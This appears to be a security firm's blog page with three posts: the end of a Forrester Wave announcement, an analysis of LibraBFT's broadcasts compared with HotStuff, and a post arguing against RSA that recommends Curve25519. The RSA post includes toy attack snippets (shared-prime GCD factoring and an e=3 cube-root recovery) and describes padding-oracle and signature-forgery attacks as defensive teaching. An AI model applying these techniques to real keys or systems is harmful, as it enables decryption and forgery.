Our Take: We are intentional about focusing deeply on our niche skillset because it prepares us for solving our clients’ most challenging problems. We produce and use publicly available tools in our assessments, resulting in repeatable, verifiable results that other firms can’t offer.

We’re finding more ways to improve

Even as a Leader, this report shows us some opportunities for improvement. Growing at a pace that meets increasing market demand for our services is a challenge. We prefer to hire well rather than hire quickly. We know that the price point of our niche services puts our paid expertise out of reach for some smaller and under-resourced companies. We will address that by continuing to offer our knowledge on our blog, our open-source tools on GitHub, and our community resources like Empire Hacking and the NYC-Infosec directory. Finally, we are committed to translating summaries of our highly technical work for clients’ non-security executives. You can check out how we’re doing that in our public reports and presentations.

Overall, we’re honored to be included in this year’s report, encouraged by its findings, and excited to share the results.

Could you use a Forrester Wave Leader’s advice on a cybersecurity problem you’re facing? Contact us

On LibraBFT’s use of broadcasts

LibraBFT is the Byzantine Fault Tolerant (BFT) consensus algorithm used by the recently released Libra cryptocurrency. LibraBFT is based on another BFT consensus algorithm called HotStuff. While some have noted the similarities between the two algorithms, they differ in some crucial respects. In this post we highlight one such difference: in LibraBFT, non-leaders perform broadcasts. This has implications on liveness analysis, communication complexity, and leader election. We delve into each of these topics following a brief review of what BFT consensus algorithms are and why they are useful.

A brief history of BFT consensus algorithms

The term Byzantine Fault Tolerant (BFT) originates from a paper by Lamport, Shostak, and Pease. In that paper, the authors consider a fictional scenario in which a group of Byzantine generals are considering whether to attack a city. The problem is that some of the generals are traitors. The question is, if the traitors spread misinformation, then under what conditions can the group agree to attack or retreat from the city? Note that neither attacking nor retreating is considered more favorable than the other: the problem is simply to agree on one action!

This scenario is a metaphor for one that commonly arises in distributed systems: the generals are nodes in a network, the traitors are faulty nodes, and attacking the city is, say, committing a transaction to a database.

The Lamport et al. paper proposes a solution to this problem. However, the solution implicitly assumes a synchronous network, which means that messages between nodes are delivered within a fixed, known time bound. Compare this to an asynchronous network, where messages can be arbitrarily delayed and even reordered.

Dwork, Lynch, and Stockmeyer were the first to propose deterministic algorithms that solve the Byzantine generals problem for “partially synchronous” networks. (Earlier, Rabin and Ben-Or had proposed randomized algorithms.) Dwork et al.’s analysis of what it means for a network to be “partially synchronous” was a significant contribution to the study of BFT algorithms. However, the purpose of Dwork et al.’s algorithms appears to have been to establish the existence of such solutions. Thus, their algorithms are of more theoretical than practical interest.

Toward the end of the century, Castro and Liskov proposed a solution on which many contemporary algorithms have been based (e.g., Tendermint, described below). Castro and Liskov’s algorithm, called Practical Byzantine Fault Tolerance (PBFT), works as follows. Each round has a designated leader chosen from among the nodes, and each round is composed of three phases. Roughly, in the first phase, the leader proposes a command for all nodes to execute; in the second phase, the nodes vote on the command; and in the third phase, the nodes acknowledge receipt of each others’ votes and execute the command. When a node believes that a round has gone on for too long, it sends a timeout message to all other nodes. Nodes must then agree that the round should time out, a process that is somewhat complicated. PBFT, as a whole, works as long as no more than ⌊(n-1)/3⌋ of the n nodes are faulty, which is the best that one can do.

In order to circumvent a classic impossibility result of Fischer, Lynch, and Paterson, PBFT prioritizes safety over liveness. This means that, say, a leader could propose a command and that command could fail to be executed, e.g., because of network problems. However, the algorithm is safe in the sense that if two non-faulty nodes execute some sequence of commands, then one is necessarily a prefix of the other.

It is interesting to note how PBFT uses broadcasts. During the first phase of each round, the leader broadcasts to all nodes. But, during the second and third phases, all nodes (not just the leader) broadcast to one another.

Figure 1 from the PBFT paper, which calls the three phases of each round “pre-prepare,” “prepare,” and “commit.” The numbers represent network nodes and the arrows represent messages. Note how non-leader nodes 1 and 2 broadcast to all other nodes during the second and third phases.

Many variants of PBFT have been proposed. One notable example is Tendermint. Like PBFT, Tendermint proceeds in rounds, each round is divided into three phases, and the use of broadcasts in each phase is similar. However, whereas timeouts in PBFT occur with respect to entire rounds, timeouts in Tendermint occur with respect to individual phases, which many regard as a simpler strategy. (See here for additional discussion.) Also, Tendermint has a well-tested implementation that is actively developed. For this reason, if none other, Tendermint has seen widespread use.

HotStuff may also be regarded as a variant of PBFT. The HotStuff algorithm is “pipelined” so that timing out in a round is essentially no different than timing out in a phase. But perhaps HotStuff’s most notable improvement over PBFT is its reduced “authenticator complexity.” As defined in the HotStuff paper, “an authenticator is either a partial signature or a signature” (page 4). The paper argues that “Authenticator complexity is a useful measure of communication complexity… it hides unnecessary details about the transmission topology… n messages carrying one authenticator count the same as one message carrying n authenticators.”

HotStuff achieves reduced authenticator complexity, in part, by using threshold signatures. This allows non-leaders to send their messages to only the leader and not to one another. For example, when voting on a command, nodes in HotStuff send their “share” of a signature to the leader. Once the leader has accumulated 2⌊(n-1)/3⌋ + 1 such shares, it broadcasts the combined signature to all other nodes. The other phases of the HotStuff algorithm are similar. In this way, HotStuff achieves linear authenticator complexity.
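To make that threshold concrete, here is a minimal sketch (ours, not code from the HotStuff paper) of the quorum arithmetic: with n nodes and at most f = ⌊(n-1)/3⌋ tolerated faults, the leader waits for 2f + 1 vote shares before combining them.

// Minimal sketch of the quorum arithmetic used by PBFT-family protocols
// such as HotStuff: tolerate f = floor((n - 1) / 3) faulty nodes and
// require 2f + 1 matching vote shares before combining a signature.
fn quorum_threshold(n: usize) -> usize {
    let f = (n - 1) / 3;
    2 * f + 1
}

fn main() {
    assert_eq!(quorum_threshold(4), 3);    // 4 nodes tolerate 1 fault
    assert_eq!(quorum_threshold(100), 67); // 100 nodes tolerate 33 faults
}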

LibraBFT

LibraBFT is the consensus algorithm used by the Libra cryptocurrency. LibraBFT is based on HotStuff. According to the Libra authors, there were “three reasons for selecting the HotStuff protocol as the basis for LibraBFT: (1) simplicity and modularity of the safety argument; (2) ability to easily integrate consensus with execution; and (3) promising performance in early experiments.”

LibraBFT and HotStuff are very similar. For example, LibraBFT retains HotStuff’s pipelined design. Furthermore, when voting on a command (or “block” to use LibraBFT’s terminology), nodes send their votes to only the leader and not to all other nodes.

Figure 3 from the LibraBFT paper. The letters B, V, and C are mnemonic for “block,” “vote,” and “[quorum] certificate,” respectively. Note how nodes send their votes to only the leader (like in HotStuff) and do not broadcast them to all other nodes (like in PBFT). On the other hand, note the caption, which indicates that “round synchronization” is not reflected in the figure. Round synchronization does involve broadcasts.

However, to achieve certain goals (explained below), LibraBFT uses broadcasts in ways that HotStuff does not. (In this way, LibraBFT resembles its distant ancestor, PBFT.) Specifically, LibraBFT requires non-leader nodes to perform broadcasts under the following circumstances:

  1. Nodes regularly synchronize their states using broadcasts.
  2. When a timeout is reached, e.g., because of network problems or a faulty leader, nodes send a timeout message to all other nodes.

The use of broadcasts for state synchronization makes it easier to establish a liveness result for LibraBFT. The reason for broadcasting timeouts is not given in the LibraBFT paper. However, as we explain below, we suspect it is to allow for the future use of an adaptive leader election mechanism. Despite these advantages, the additional broadcasts have the unfortunate side-effect of increasing the algorithm’s communication complexity. However, such an increase in communication complexity may be unavoidable. (Neither the state synchronization broadcasts nor the timeout broadcasts should affect the algorithm’s safety.)

Note: A recent blog post entitled “Libra: The Path Forward” makes clear that LibraBFT is a work-in-progress. Perhaps for this reason, there are discrepancies between LibraBFT as defined in the LibraBFT paper and as implemented in the Libra source code. For the remainder of this blog post, we focus on the former. We point out a couple of the differences between the LibraBFT specification and the Libra source code below. (Also note that, while the LibraBFT paper does contain code, that code is not part of Libra itself, but of a simulator. The LibraBFT authors “intend to share the code for this simulator and provide experimental results in a subsequent version of the report” (page 4). That version of the report has not yet been released.)

Liveness analysis

In LibraBFT, “nodes broadcast their states at least once per period of time [the minimum broadcast interval] 𝐼 > 0” (page 22). No similar notion exists in HotStuff. Unsurprisingly, this makes it easier to establish a liveness result for LibraBFT. However, liveness analysis of the two algorithms differ in other ways, as we now explain.

HotStuff’s liveness theorem asserts that, under certain technical conditions including that the round leader is non-faulty, there exists a time bound within which all non-faulty nodes execute a command and move on to the next round. The liveness theorem is parameterized by two functions: Leader and NextView. Leader is a function of the round number and determines the leader of that round. The arguments of NextView are not given specifically, but include at least the round number. NextView determines when round timeout “interrupts” are generated.

HotStuff’s liveness theorem

LibraBFT’s liveness theorem has a similar form. However, there are two significant differences. First, LibraBFT’s analogs of the Leader and NextView functions are not left as parameters, but are given explicitly. Second, the time bound within which a command is executed is not merely asserted to exist, but is also given explicitly.


LibraBFT’s liveness theorem

Of note is the fact that LibraBFT’s explicit time bound features 𝐼, the minimum broadcast interval, mentioned above. The appearance of 𝐼 demonstrates that LibraBFT’s liveness analysis differs fundamentally from that of HotStuff, and is not merely a byproduct of explicitly given Leader and NextView mechanisms.

We would also point out that this is a place where the LibraBFT specification and the Libra source code do not exactly match. In LibraBFT, nodes broadcast their states to one another using DataSyncNotification messages (defined in Appendix A.3 of the LibraBFT paper). Nothing analogous to a DataSyncNotification message seems to exist within the Libra source code. For example, if one looks at the start_event_processing function from Libra’s chained_bft module, one can see calls to functions that process proposals, votes, etc. However, there is no call that would seem to process something resembling a DataSyncNotification message.

fn start_event_processing(
    &self,
    event_processor: ConcurrentEventProcessor,
    executor: TaskExecutor,
    ...
) {
    executor.spawn(Self::process_new_round_events(...)...);
    executor.spawn(Self::process_proposals(...)...);
    executor.spawn(Self::process_winning_proposals(...)...);
    executor.spawn(Self::process_block_retrievals(...)...);
    executor.spawn(Self::process_chunk_retrievals(...)...);
    executor.spawn(Self::process_votes(...)...);
    executor.spawn(Self::process_new_round_msg(...)...);
    executor.spawn(Self::process_outgoing_pacemaker_timeouts(...)...);
}

An excerpt of the “start_event_processing” function from Libra’s “chained_bft” module. Note that none of the calls seem to process something resembling a LibraBFT DataSyncNotification message.

The bottom line is that the LibraBFT liveness analysis does not directly apply to the Libra source code in its present form. However, as mentioned above, LibraBFT is a work-in-progress. So, the existence of some discrepancies between the LibraBFT specification and the Libra source code is not surprising.

Communication complexity

As mentioned above in the description of HotStuff, HotStuff achieves linear authenticator complexity, where “an authenticator is either a partial signature or a signature” sent in a network message in a single round. What is LibraBFT’s authenticator complexity? The answer is somewhat ambiguous.

The LibraBFT paper does not mention “authenticator complexity” specifically, though it does claim that “LibraBFT has two desirable properties that BFT consensus protocols preceding HotStuff were not able to simultaneously support — linearity and responsiveness. … Informally, linearity guarantees that driving transaction commits incurs only linear communication…” (page 2). The claim is not addressed later in the paper. As we argue, LibraBFT’s authenticator complexity is at least O(n²), where n is the number of nodes. So, either the authors were not referring to authenticator complexity, or the claim is some sort of oversight.

When a LibraBFT node believes that a round has gone on for too long, it broadcasts a timeout message to all other nodes. These timeout messages are signed. Therefore, LibraBFT’s authenticator complexity is at least O(n²).

How does LibraBFT’s use of broadcasts in state synchronization affect authenticator complexity?

State synchronization is parameterized by the minimum broadcast interval, 𝐼, mentioned above in the discussion of liveness analysis. The LibraBFT paper states that “nodes broadcast their states at least once per period of time 𝐼 > 0” (page 22). Taking this into account, the authenticator complexity of LibraBFT should be not just a function of n, but also of 𝐼.

However, the paper’s Appendix A.3 states “we have assumed that [data-synchronization messages] are transmitted over authenticated channels and omitted message signatures” (page 36). One could use this fact to argue that data synchronization does not affect authenticator complexity (though, that would feel a lot like cheating).

So, LibraBFT’s authenticator complexity is at least O(n²) due to its use of timeout broadcasts. It could be more, depending upon one’s assumptions about the network.

To be clear, this is a worst case analysis. In the common case, timeouts will not occur. Thus, if 𝐼 is large, say, many multiples of the typical round duration, then LibraBFT’s performance will be close to linear.

One final point is worth mentioning. HotStuff uses a predictable leader election strategy. As explained in the next section, the Libra authors are trying to avoid using such a strategy. To the best of our knowledge, no sub-quadratic adaptive leader election strategy currently exists. Thus, in comparing the communication complexity of HotStuff and LibraBFT, some increase may be unavoidable.

Leader election

At the time of this writing, the Libra source code’s leader election strategy is round-robin. However, the LibraBFT authors note that this strategy makes round leaders predictable, which facilitates denial-of-service attacks. In considering alternatives, the authors note that depending on hashes in a naive way could facilitate “grinding attacks,” e.g., where an attacker influences the hash in such a way as to increase the likelihood of a particular node being selected the leader.

To address the former problem and circumvent the latter, the authors state, “we intend to use a verifiable random function (VRF) in the future.” (In fact, a VRF is already implemented in the Libra source code, though it does not yet seem to be used.) In the next two paragraphs, we explain what VRFs are. Then, following a brief explanation of what it means for a LibraBFT block to be “committed,” we explain how LibraBFT’s proposed use of VRFs in leader elections is enabled by its use of broadcasts.

Intuitively, a VRF is a function that, given some input, produces two outputs: a random-looking value, and a proof that the value was derived from the input. The function is expected to have two properties. First, it should not be obvious how the random-looking value was derived from the input. Second, it should be possible to convince an observer that the random-looking value was derived from the input, even though that fact is not obvious. This latter property is made possible via the proof.

A simple example of a VRF is given in Section 4 of Goldberg, Reyzin, Papadopoulos, and Vcelak’s draft RFC. In that example, the random-looking value is an RSA signature computed over the hash of the input, and the proof is the hash. An observer can verify the proof by checking that the input has the hash, and that the signature corresponds to the hash. (Note: for production code, we recommend using the elliptic-curve-based VRF of Section 5 of the RFC, and not the RSA-based VRF of Section 4.)

We now briefly explain what it means for a LibraBFT block to be “committed.” In LibraBFT, blocks and quorum certificates alternate to form a chain:

B_0 ← C_0 ← B_1 ← C_1 ← B_2 ← C_2 ← ⋯

These blocks (certificates) need not be proposed (assembled) in contiguous rounds; there could be arbitrarily large gaps between them. A block is said to be “committed” when: (1) it appears below two other blocks, (2) all three blocks have associated quorum certificates, and (3) the blocks were proposed in contiguous rounds.

The reason for this rule is a bit technical. But, intuitively, a “committed” block is considered permanent by all non-faulty nodes. In contrast, a block that appears below fewer than two certified blocks is considered impermanent, and may have to be abandoned in favor of another block.
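As a rough illustration (ours, not code from Libra), the commit rule can be checked from nothing more than the rounds in which each certified block was proposed; representing a certified block by its round number alone is a simplifying assumption.

// Hypothetical sketch of the 3-chain commit rule described above. Each
// entry in `certified_rounds` is the round in which a certified block
// was proposed, in chain order.
fn is_committed(certified_rounds: &[u64], idx: usize) -> bool {
    // The block at `idx` is committed when two certified blocks follow it
    // and all three were proposed in contiguous rounds.
    idx + 2 < certified_rounds.len()
        && certified_rounds[idx + 1] == certified_rounds[idx] + 1
        && certified_rounds[idx + 2] == certified_rounds[idx] + 2
}

fn main() {
    let rounds = [1, 2, 3, 7, 8, 10];
    assert!(is_committed(&rounds, 0));  // rounds 1, 2, 3 are contiguous
    assert!(!is_committed(&rounds, 2)); // rounds 3, 7, 8 are not
    assert!(!is_committed(&rounds, 3)); // rounds 7, 8, 10 are not
}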

The LibraBFT authors intend to use VRFs in leader elections as follows. Each node will have its own instance of some VRF (e.g., a VRF instantiated with a private key belonging to the node). The leader for round i will be determined using the VRF instance of the round leader for the most recently committed block. That VRF instance will determine a seed for a pseudo-random function (PRF). The resulting PRF instance will then determine the leader for round i and each subsequent round until a new block becomes committed. The reason for using two functions like this is (we believe) so that round leaders can be determined even if the proposer of the most recently committed block goes offline.
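Here is a hypothetical sketch of that flow, with a standard-library hash standing in for both the VRF and the PRF (the names and types are ours, not Libra’s): the proposer of the most recently committed block supplies a seed, and a PRF keyed with that seed picks the leader for each round until a new block commits.

// Hypothetical sketch of the described leader election: a seed derived
// from a VRF (here just a constant) keys a PRF (here a simple hash),
// which maps each round number to a leader index.
use std::collections::hash_map::DefaultHasher;
use std::hash::{Hash, Hasher};

fn prf(seed: u64, round: u64) -> u64 {
    let mut hasher = DefaultHasher::new();
    (seed, round).hash(&mut hasher);
    hasher.finish()
}

fn leader_for_round(vrf_seed: u64, round: u64, num_nodes: u64) -> u64 {
    prf(vrf_seed, round) % num_nodes
}

fn main() {
    // In LibraBFT the seed would come from the VRF instance of the node
    // that proposed the most recently committed block.
    let vrf_seed = 0xdead_beef_u64;
    for round in 10..13 {
        println!("round {} -> leader {}", round, leader_for_round(vrf_seed, round, 4));
    }
}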

We now explain how LibraBFT’s proposed use of VRFs in leader elections is enabled by its use of broadcasts. Or, more specifically, we explain why LibraBFT’s proposed use of VRFs would not work if a node could send a timeout message to just one other node, as is the case in HotStuff. The purpose of a timeout message is to tell the next round leader to start the next round. But, as we show in the next several paragraphs, who that next leader is can depend upon the cause of the timeout.

Suppose that in contiguous rounds i-2, i-1, and i, blocks B_{m-2}, B_{m-1}, and B_m are proposed. Further suppose that the leader for round i assembles a quorum certificate C_m and broadcasts it to all other nodes. Thus, at the start of round i+1, the most recently committed block is B_{m-2}:

B_0 ← C_0 ← ⋯ ← B_{m-2} ← C_{m-2} ← B_{m-1} ← C_{m-1} ← B_m ← C_m

But suppose that the leader for round i does not receive a block proposal for round i+1 within a reasonable timeframe. If the leader for round i could send a timeout message to just one other node, to whom should she send it? (Note that the leader for round i plays no special role in detecting or announcing the timeout of round i+1.)

Consider the following two explanations for why the leader for round i does not receive a block proposal for round i+1.

  • Case 1: The leader for round i+1 is faulty and never proposed a block. In this case, the most recently committed block at round i+2 is still B_{m-2}. Thus, the leader for round i+2 should be determined by the same PRF instance that determined the leader for round i+1. If the leader for round i could send a timeout message to just one other node, she should send it to the leader determined by this existing PRF instance.
  • Case 2: There is a network delay. The leader for round i+1 proposed a block and assembled a quorum certificate, but the leader for round i did not receive them in time. In this case, the most recently committed block at round i+2 is B_{m-1}. Thus, the leader for round i+2 should be determined by a new PRF instance, one seeded by the VRF instance belonging to the proposer of B_{m-1}. If the leader for round i could send a timeout message to just one other node, she should send it to the leader determined by this new PRF instance.

This ambiguity is resolved by having the leader for round i send its timeout message to all other nodes. We would not be surprised if the LibraBFT authors introduced timeout broadcasts to address this type of scenario specifically.

Finally, note that a similar problem does not exist in HotStuff. In HotStuff, the round leader is determined by “some deterministic mapping from view number to a replica, eventually rotating through all replicas,” and does not depend on the most recently committed block. On the other hand, the predictability of round leaders makes HotStuff susceptible to denial-of-service attacks, which the LibraBFT authors are trying to avoid.

LibraBFT and HotStuff are distinct algorithms

LibraBFT and HotStuff are very similar, but the two algorithms differ in some crucial respects. In LibraBFT, non-leaders perform broadcasts. The use of broadcasts in state synchronization makes it easier to establish a liveness result for LibraBFT. We suspect that timeout broadcasts were introduced to allow for the future use of an adaptive leader election mechanism, e.g., one based on VRFs. Despite these advantages, the additional broadcasts increase the algorithm’s communication complexity. However, this increase in communication complexity may be unavoidable.

We intend to keep a close eye on Libra. If you are developing a Libra application, please consider us for your security review.

Updated July 16, 2019.

Seriously, stop using RSA

Here at Trail of Bits we review a lot of code. From major open source projects to exciting new proprietary software, we’ve seen it all. But one common denominator in all of these systems is that for some inexplicable reason people still seem to think RSA is a good cryptosystem to use. Let me save you a bit of time and money and just say outright—if you come to us with a codebase that uses RSA, you will be paying for the hour of time required for us to explain why you should stop using it.

RSA is an intrinsically fragile cryptosystem containing countless foot-guns which the average software engineer cannot be expected to avoid. Weak parameters can be difficult, if not impossible, to check, and its poor performance compels developers to take risky shortcuts. Even worse, padding oracle attacks remain rampant 20 years after they were discovered. While it may be theoretically possible to implement RSA correctly, decades of devastating attacks have proven that such a feat may be unachievable in practice.

What is RSA again?

RSA is a public-key cryptosystem that has two primary use cases. The first is public key encryption, which lets a user, Alice, publish a public key that allows anyone to send her an encrypted message. The second use case is digital signatures, which allow Alice to “sign” a message so that anyone can verify the message hasn’t been tampered with. The convenient thing about RSA is that the signing algorithm is basically just the encryption algorithm run in reverse. Therefore for the rest of this post we’ll often refer to both as just RSA.

To set up RSA, Alice needs to choose two primes p and q that will generate the group of integers modulo N = pq. She then needs to choose a public exponent e and private exponent d such that ed = 1 mod (p-1)(q-1). Basically, e and d need to be inverses of each other.

Once these parameters have been chosen, another user, Bob, can send Alice a message M by computing C = M^e (mod N). Alice can then decrypt the ciphertext by computing M = C^d (mod N). Conversely, if Alice wants to sign a message M, she computes S = M^d (mod N), which any user can verify was signed by her by checking M = S^e (mod N).
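As a concrete (and deliberately insecure) illustration of those equations, here is a toy RSA round trip with tiny textbook parameters of our choosing; real keys use primes thousands of bits long, and, as discussed below, real use also requires padding.

// Toy RSA with tiny textbook parameters -- for illustrating the math only,
// never for real use (no padding, trivially factorable modulus).
fn mod_pow(mut base: u64, mut exp: u64, modulus: u64) -> u64 {
    let mut result = 1;
    base %= modulus;
    while exp > 0 {
        if exp & 1 == 1 {
            result = result * base % modulus;
        }
        base = base * base % modulus;
        exp >>= 1;
    }
    result
}

fn main() {
    let (p, q) = (61u64, 53u64);  // secret primes
    let n = p * q;                // public modulus N = 3233
    let phi = (p - 1) * (q - 1);  // (p-1)(q-1) = 3120
    let e = 17u64;                // public exponent
    let d = 2753u64;              // private exponent: e*d = 1 mod (p-1)(q-1)
    assert_eq!(e * d % phi, 1);

    let m = 65u64;                   // message
    let c = mod_pow(m, e, n);        // encrypt: C = M^e mod N
    assert_eq!(mod_pow(c, d, n), m); // decrypt: M = C^d mod N

    let s = mod_pow(m, d, n);        // sign:    S = M^d mod N
    assert_eq!(mod_pow(s, e, n), m); // verify:  M = S^e mod N
}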

That’s the basic idea. We’ll get to padding—essential for both use cases—in a bit, but first let’s see what can go wrong during parameter selection.

Setting yourself up for failure

RSA requires developers to choose quite a few parameters during setup. Unfortunately, seemingly innocent parameter-selection methods degrade security in subtle ways. Let’s walk through each parameter choice and see what nasty surprises await those who choose poorly.

Prime Selection

RSA’s security is based off the fact that, given a (large) number N that’s the product of two primes p and q, factoring N is hard for people who don’t know p and q. Developers are responsible for choosing the primes that make up the RSA modulus. This process is extremely slow compared to key generation for other cryptographic protocols, where simply choosing some random bytes is sufficient. Therefore, instead of generating a truly random prime number, developers often attempt to generate one of a specific form. This almost always ends badly.

There are many ways to choose primes in such a way that factoring N is easy. For example, p and q must be globally unique. If p or q ever gets reused in another RSA modulus, then both moduli can be easily factored using the GCD algorithm. Bad random number generators make this scenario somewhat common, and research has shown that roughly 1% of TLS traffic in 2012 was susceptible to such an attack. Moreover, p and q must be chosen independently. If p and q share approximately half of their upper bits, then N can be factored using Fermat’s method. In fact, even the choice of primality testing algorithm can have security implications.
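To see how little work the shared-prime failure leaves an attacker, here is a minimal sketch with toy numbers of our choosing (real moduli are thousands of bits, but the attack is the same single gcd computation):

// Sketch of the shared-prime GCD attack: two RSA moduli that reuse a
// prime can both be factored with one gcd call, no factoring required.
fn gcd(mut a: u64, mut b: u64) -> u64 {
    while b != 0 {
        let r = a % b;
        a = b;
        b = r;
    }
    a
}

fn main() {
    // Two "independently generated" keys that both picked p = 61.
    let n1: u64 = 61 * 53; // 3233
    let n2: u64 = 61 * 71; // 4331
    let p = gcd(n1, n2);
    assert_eq!(p, 61);
    assert_eq!((n1 / p, n2 / p), (53, 71)); // both moduli fully factored
}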

Perhaps the most widely-publicized prime selection attack is the ROCA vulnerability in RSALib which affected many smartcards, trusted platform modules, and even Yubikeys. Here, key generation only used primes of a specific form to speed up computation time. Primes generated this way are trivial to detect using clever number theory tricks. Once a weak system has been recognized, the special algebraic properties of the primes allow an attacker to use Coppersmith’s method to factor N. More concretely, that means if the person sitting next to me at work uses a smartcard granting them access to private documents, and they leave it on their desk during lunch, I can clone the smartcard and give myself access to all their sensitive files.

It’s important to recognize that in none of these cases is it intuitively obvious that generating primes in such a way leads to complete system failure. Really subtle number-theoretic properties of primes have a substantial effect on the security of RSA. To expect the average developer to navigate this mathematical minefield severely undermines RSA’s safety.

Private Exponent

Since using a large private key negatively affects decryption and signing time, developers have an incentive to choose a small private exponent d, especially in low-power settings like smartcards. However, it is possible for an attacker to recover the private key when d is less than the 4th root of N. Instead, developers are encouraged to choose a large d such that Chinese remainder theorem techniques can be used to speed up decryption. However, this approach’s complexity increases the probability of subtle implementation errors, which can lead to key recovery. In fact, one of our interns last summer modelled this class of vulnerabilities with our symbolic execution tool Manticore.

People might call me out here and point out that normally when setting up RSA you first generate a modulus, use a fixed public exponent, and then solve for the private exponent. This prevents low private exponent attacks because if you always use one of the recommended public exponents (discussed in the next section) then you’ll never wind up with a small private exponent. Unfortunately this assumes developers actually do that. In circumstances where people implement their own RSA, all bets are off in terms of using standard RSA setup procedures, and developers will frequently do strange things like choose the private exponent first and then solve for the public exponent.

Public Exponent

Just as in the private exponent case, implementers want to use small public exponents to save on encryption and verification time. It is common to use Fermat primes in this context, in particular e = 3, 17, and 65537. Despite cryptographers recommending the use of 65537, developers often choose e = 3 which introduces many vulnerabilities into the RSA cryptosystem.

Developers have even used e = 1, which doesn’t actually encrypt the plaintext

When e = 3, or a similarly small number, many things can go wrong. Low public exponents often combine with other common mistakes to either allow an attacker to decrypt specific ciphertexts or factor N. For instance, the Franklin-Reiter attack allows a malicious party to decrypt two messages that are related by a known, fixed distance. In other words, suppose Alice only sends “chocolate” or “vanilla” to Bob. These messages will be related by a known value and allow an attacker Eve to determine which are “chocolate” and which are “vanilla.” Some low public exponent attacks even lead to key recovery. If the public exponent is small (not just 3), an attacker who knows several bits of the secret key can recover the remaining bits and break the cryptosystem. While many of these e = 3 attacks on RSA encryption are mitigated by padding, developers who implement their own RSA fail to use padding at an alarmingly high rate.
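One of the simplest such failures is worth spelling out: with e = 3 and no padding, a short message M satisfies M^3 < N, so the “ciphertext” is just M^3 over the integers and an attacker recovers M with an integer cube root. Below is a minimal sketch with toy parameters of our choosing, chosen only for illustration:

// Sketch of the textbook e = 3 attack on unpadded RSA: when M^3 < N, no
// modular reduction happens, so an integer cube root of the ciphertext
// recovers the message without the private key.
fn main() {
    let n: u64 = 59 * 53; // tiny public modulus (3127)
    let m: u64 = 10;      // short, unpadded message
    let c = m.pow(3) % n; // "encryption" with e = 3; 1000 < 3127, so c = 1000

    // Attacker's view: only c and n are known.
    let recovered = (c as f64).cbrt().round() as u64;
    assert_eq!(recovered.pow(3), c); // confirm the cube root is exact
    assert_eq!(recovered, m);        // message recovered with no key
}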

RSA signatures are equally brittle in the presence of low public exponents. In 2006, Bleichenbacher found an attack which allows attackers to forge arbitrary signatures in many RSA implementations, including the ones used by Firefox and Chrome. This means that any TLS certificate from a vulnerable implementation could be forged. This attack takes advantage of the fact that many libraries use a small public exponent and omit a simple padding verification check when processing RSA signatures. Bleichenbacher’s signature forgery attack is so simple that it is a commonly used exercise in cryptography courses.

Parameter Selection is Hard

The common denominator in all of these parameter attacks is that the domain of possible parameter choices is much larger than that of secure parameter choices. Developers are expected to navigate this fraught selection process on their own, since all but the public exponent must be generated privately. There are no easy ways to check that the parameters are secure; instead developers need a depth of mathematical knowledge that shouldn’t be expected of non-cryptographers. While using RSA with padding may save you in the presence of bad parameters, many people still choose to use broken padding or no padding at all.

Padding oracle attacks everywhere

As we mentioned above, just using RSA out of the box doesn’t quite work. For example, the RSA scheme laid out in the introduction would produce identical ciphertexts if the same plaintext were ever encrypted more than once. This is a problem, because it would allow an adversary to infer the contents of the message from context without being able to decrypt it. This is why we need to pad messages with some random bytes. Unfortunately, the most widely used padding scheme, PKCS #1 v1.5, is often vulnerable to something called a padding oracle attack.

Padding oracles are pretty complex, but the high-level idea is that adding padding to a message requires the recipient to perform an additional check–whether the message is properly padded. When the check fails, the server throws an invalid padding error. That single piece of information is enough to slowly decrypt a chosen message. The process is tedious and involves manipulating the target ciphertext millions of times to isolate the changes which result in valid padding. But that one error message is all you need to eventually decrypt a chosen ciphertext. These vulnerabilities are particularly bad because attackers can use them to recover pre-master secrets for TLS sessions. For more details on the attack, check out this excellent explainer.

The original attack on PKCS #1 v1.5 was discovered way back in 1998 by Daniel Bleichenbacher. Despite being over 20 years old, this attack continues to plague many real-world systems today. Modern versions of this attack often involve a padding oracle slightly more complex than the one originally described by Bleichenbacher, such as server response time or some sort of protocol downgrade in TLS. One particularly shocking example was the ROBOT attack, which was so bad that a team of researchers were able to sign messages with Facebook’s and PayPal’s secret keys. Some might argue that this isn’t actually RSA’s fault – the underlying math is fine, people just messed up an important standard several decades ago. The thing is, we’ve had a standardized padding scheme with a rigorous security proof, OAEP, since 1998. But almost no one uses it. Even when they do, OAEP is notoriously difficult to implement and is often vulnerable to Manger’s attack, which is another padding oracle attack that can be used to recover plaintext.

The fundamental issue here is that padding is necessary when using RSA, and this added complexity opens the cryptosystem up to a large attack surface. The fact that a single bit of information, whether the message was padded correctly, can have such a large impact on security makes developing secure libraries almost impossible. TLS 1.3 no longer supports RSA key exchange, so we can expect to see fewer of these attacks going forward, but as long as developers continue to use RSA in their own applications, there will be padding oracle attacks.

So what should you use instead?

People often prefer using RSA because they believe it’s conceptually simpler than the somewhat confusing DSA protocol or moon math elliptic curve cryptography (ECC). But while it may be easier to understand RSA intuitively, it lacks the misuse resistance of these other more complex systems.

First of all, a common misconception is that ECC is super dangerous because choosing a bad curve can totally sink you. While it is true that curve choice has a major impact on security, one benefit of using ECC is that parameter selection can be done publicly. Cryptographers make all the difficult parameter choices so that developers just need to generate random bytes of data to use as keys and nonces. Developers could theoretically build an ECC implementation with terrible parameters and fail to check for things like invalid curve points, but they tend not to. A likely explanation is that the math behind ECC is so complicated that very few people feel confident enough to actually implement it. In other words, it intimidates people into using libraries built by cryptographers who know what they’re doing. RSA, on the other hand, is so simple that it can be (poorly) implemented in an hour.

Second, any Diffie-Hellman-based key agreement or signature scheme (including the elliptic curve variants) requires no padding and therefore sidesteps padding oracle attacks entirely. This is a major win considering RSA’s very poor track record of avoiding this class of vulnerabilities.

Trail of Bits recommends using Curve25519 for key exchange and digital signatures. Encryption should be done using ECIES, which combines an elliptic curve key exchange with a symmetric encryption algorithm. Curve25519 was designed to entirely prevent some of the things that can go wrong with other curves, and it is very performant. Even better, it is implemented in libsodium, which has easy-to-read documentation and is available for most languages.
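
For example, here is a short sketch using PyNaCl, the Python bindings for libsodium (the message contents are arbitrary). SealedBox implements an ECIES-style construction, an ephemeral X25519 key exchange plus an authenticated symmetric cipher, and SigningKey provides Ed25519 signatures; note that there are no parameters, padding modes, or exponents to choose.

from nacl.public import PrivateKey, SealedBox
from nacl.signing import SigningKey

# Encryption: ephemeral X25519 key exchange + authenticated symmetric cipher
recipient = PrivateKey.generate()
ciphertext = SealedBox(recipient.public_key).encrypt(b"attack at dawn")
plaintext = SealedBox(recipient).decrypt(ciphertext)

# Digital signatures with Ed25519
signer = SigningKey.generate()
signed = signer.sign(b"attack at dawn")
signer.verify_key.verify(signed)  # raises BadSignatureError if tampered with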

Seriously, stop using RSA
